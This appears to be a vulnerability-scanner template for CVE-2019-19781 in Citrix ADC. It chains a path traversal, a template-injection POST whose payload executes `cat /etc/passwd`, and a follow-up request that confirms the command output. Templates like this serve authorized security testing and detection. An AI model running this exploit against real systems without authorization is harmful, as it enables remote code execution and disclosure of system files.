id: CVE-2019-19781 info: name: Citrix ADC Path Traversal risk: High params: - root: '{{.BaseURL}}' variables: - endpoint: | vpn/ requests: - method: GET url: >- {{.root}}/{{.endpoint}}../vpns/cfg/smb.conf headers: - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36 detections: - >- StringSearch("resBody", "[global]") - method: POST redirect: false url: >- {{.root}}/{{.endpoint}}../vpns/portal/scripts/newbm.pl headers: - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36 - NSC_USER: ../../../netscaler/portal/templates/somuniquestr - NSC_NONCE: nsroot - Content-Type: application/x-www-form-urlencoded body: | url=http://example.com&title=somuniquestr&desc=[% template.new('BLOCK' = 'print `cat /etc/passwd`') %] detections: - >- 1 == 0 # checking if exploit works - method: GET redirect: false url: >- {{.root}}/{{.endpoint}}../vpns/portal/somuniquestr.xml headers: - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36 - NSC_USER: nsroot - NSC_NONCE: nsroot detections: - >- StatusCode() == 200 && StringSearch("response", "root:") && StringSearch("response", "bin/bash") references: - https://www.cvebase.com/cve/2019/19781